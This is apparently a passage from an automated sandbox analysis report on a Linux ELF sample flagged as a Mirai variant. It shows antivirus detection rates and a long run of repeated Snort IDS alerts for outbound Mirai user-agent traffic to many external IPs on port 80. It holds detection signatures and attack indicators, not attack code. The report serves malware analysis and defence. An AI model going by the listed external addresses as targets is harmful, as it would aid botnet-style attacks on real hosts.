    Timestamp:192.168.2.1588.99.64.8642730802839471 02/14/24-09:29:51.033750
    SID:2839471
    Source Port:42730
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.163.53.16254374802839471 02/14/24-09:30:37.211438
    SID:2839471
    Source Port:54374
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: E6l0C6FObI.elfAvira: detected
    Source: E6l0C6FObI.elfReversingLabs: Detection: 65%
    Source: E6l0C6FObI.elfVirustotal: Detection: 66%Perma Link

    Networking

    barindex
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58378 -> 88.221.78.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56704 -> 88.149.181.115:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53226 -> 88.119.167.115:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60060 -> 112.175.243.56:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35190 -> 112.180.15.84:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33812 -> 112.223.39.29:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43794 -> 112.135.211.255:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60120 -> 95.101.201.148:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45086 -> 95.100.127.15:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60806 -> 95.165.139.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52484 -> 95.47.167.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52620 -> 95.215.242.21:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54268 -> 95.86.78.146:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36418 -> 95.58.76.157:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34790 -> 95.111.218.63:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51906 -> 112.169.120.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52944 -> 112.166.212.55:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47280 -> 95.73.170.175:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55932 -> 95.100.203.69:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55572 -> 95.100.53.49:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57886 -> 95.79.128.165:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35078 -> 95.221.199.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57198 -> 95.35.40.90:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55624 -> 95.100.53.49:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51420 -> 112.135.219.68:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47730 -> 112.74.127.22:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52534 -> 112.74.59.150:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34772 -> 112.78.1.57:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55688 -> 112.105.38.98:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51472 -> 112.74.103.111:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45294 -> 112.166.250.5:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53522 -> 112.30.175.165:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59552 -> 112.196.74.193:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56052 -> 112.197.165.134:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39236 -> 112.168.50.100:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38690 -> 112.184.60.51:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53568 -> 112.47.11.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59116 -> 95.101.142.194:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60494 -> 95.110.224.250:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51392 -> 95.216.114.32:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42718 -> 95.255.93.92:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50714 -> 95.141.128.200:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53612 -> 112.47.11.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46436 -> 112.29.170.239:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43004 -> 95.100.105.189:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43532 -> 95.181.203.44:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58916 -> 95.153.253.45:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52464 -> 95.101.116.48:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57094 -> 95.49.0.208:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52274 -> 95.57.108.51:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42384 -> 95.100.251.107:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58964 -> 95.79.101.54:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55850 -> 112.126.91.177:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60442 -> 95.43.199.250:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40624 -> 95.100.185.37:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33430 -> 95.216.173.124:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59496 -> 95.56.209.43:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40722 -> 88.198.147.174:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40640 -> 95.100.185.37:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34948 -> 88.147.5.63:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34804 -> 112.216.115.50:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36962 -> 95.216.204.254:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35438 -> 95.163.141.100:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51830 -> 95.56.127.179:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49394 -> 95.58.75.221:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58368 -> 95.100.5.123:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60332 -> 88.220.84.186:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39906 -> 112.167.233.6:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36342 -> 112.159.70.238:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59886 -> 112.45.120.187:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59888 -> 112.45.120.187:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42252 -> 112.74.32.155:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33542 -> 95.210.96.55:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44210 -> 95.216.93.49:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46918 -> 95.101.3.191:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35212 -> 95.101.47.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35680 -> 95.216.240.143:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52658 -> 95.214.134.48:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58762 -> 95.100.182.224:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59590 -> 95.85.71.191:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48300 -> 112.168.102.29:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51780 -> 112.200.187.9:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34188 -> 112.213.39.95:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39526 -> 112.60.15.224:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53166 -> 112.221.133.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50462 -> 95.166.153.201:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44412 -> 95.217.236.46:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36510 -> 95.158.244.29:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36480 -> 88.12.95.45:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33758 -> 88.99.29.249:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44878 -> 112.198.55.121:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41502 -> 95.128.129.61:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50378 -> 95.111.232.93:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36194 -> 95.168.249.26:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48484 -> 95.56.57.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58608 -> 88.99.179.56:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59262 -> 88.218.158.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55876 -> 88.221.47.145:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59270 -> 88.218.158.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48162 -> 95.101.187.61:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43204 -> 95.101.221.66:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60372 -> 95.216.160.150:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57698 -> 95.101.14.86:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38516 -> 112.171.185.101:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47362 -> 88.10.162.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:32972 -> 95.211.247.164:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36812 -> 95.141.36.146:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46680 -> 95.217.87.47:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57376 -> 95.217.133.224:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39022 -> 95.59.50.19:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55130 -> 95.86.125.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45162 -> 95.59.121.53:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43550 -> 88.150.154.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57020 -> 95.127.222.121:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57918 -> 88.32.110.170:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39124 -> 95.217.80.174:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58794 -> 95.216.140.64:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34422 -> 95.217.25.150:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35420 -> 95.66.132.13:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53678 -> 88.203.250.100:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49690 -> 95.217.145.165:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39686 -> 112.177.57.8:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40938 -> 112.222.35.158:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45590 -> 112.132.215.153:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46576 -> 112.192.19.97:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59498 -> 112.197.81.187:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42730 -> 88.99.64.86:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43780 -> 95.101.247.127:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45228 -> 95.101.200.97:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48516 -> 95.100.189.25:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39986 -> 112.124.165.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39168 -> 95.101.181.53:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33192 -> 112.74.18.106:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58734 -> 95.101.16.151:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44014 -> 95.101.19.63:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44132 -> 95.217.150.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51720 -> 95.216.18.101:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34672 -> 95.217.203.251:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34484 -> 95.100.136.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51486 -> 95.80.219.174:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49402 -> 95.111.254.57:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49448 -> 95.100.51.150:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35808 -> 95.101.188.30:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52208 -> 95.110.208.137:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51872 -> 95.216.123.182:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53598 -> 95.0.98.88:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59914 -> 95.143.149.193:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42706 -> 95.216.127.249:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51042 -> 88.216.129.122:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55164 -> 88.221.226.64:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50630 -> 88.63.12.223:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37116 -> 88.96.62.214:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51888 -> 88.221.100.248:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51742 -> 112.13.121.101:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52590 -> 112.171.68.227:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51690 -> 112.13.121.101:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57990 -> 112.124.32.56:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51556 -> 88.99.36.119:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50708 -> 95.128.42.202:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60210 -> 95.67.8.239:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55822 -> 95.56.20.15:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39936 -> 95.181.228.164:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42514 -> 88.221.230.144:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42840 -> 88.147.150.44:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:32960 -> 112.213.32.238:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44188 -> 112.85.242.201:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44192 -> 112.85.242.201:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49376 -> 95.170.92.20:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38158 -> 95.101.203.250:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54212 -> 95.142.35.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42402 -> 112.168.163.80:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33838 -> 112.90.88.90:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38656 -> 95.179.193.100:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:54004 -> 95.164.1.126:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34276 -> 95.142.121.34:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35120 -> 95.110.177.150:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35480 -> 95.68.75.49:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59206 -> 95.68.11.200:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47802 -> 112.185.157.90:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55122 -> 95.211.60.130:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59074 -> 95.101.241.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46436 -> 95.101.78.69:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58040 -> 95.216.30.50:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52326 -> 95.153.45.136:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34114 -> 95.79.100.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56872 -> 95.86.102.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39940 -> 112.83.37.177:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38792 -> 88.221.105.185:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41816 -> 88.28.177.64:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37846 -> 88.212.218.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50440 -> 88.84.219.103:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53080 -> 95.138.144.217:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43940 -> 95.111.242.79:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58672 -> 95.216.41.52:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60290 -> 95.158.24.64:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43390 -> 95.163.217.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47848 -> 95.165.230.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60954 -> 88.174.163.106:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39818 -> 88.99.97.116:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56122 -> 95.181.129.220:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44304 -> 88.249.66.46:80
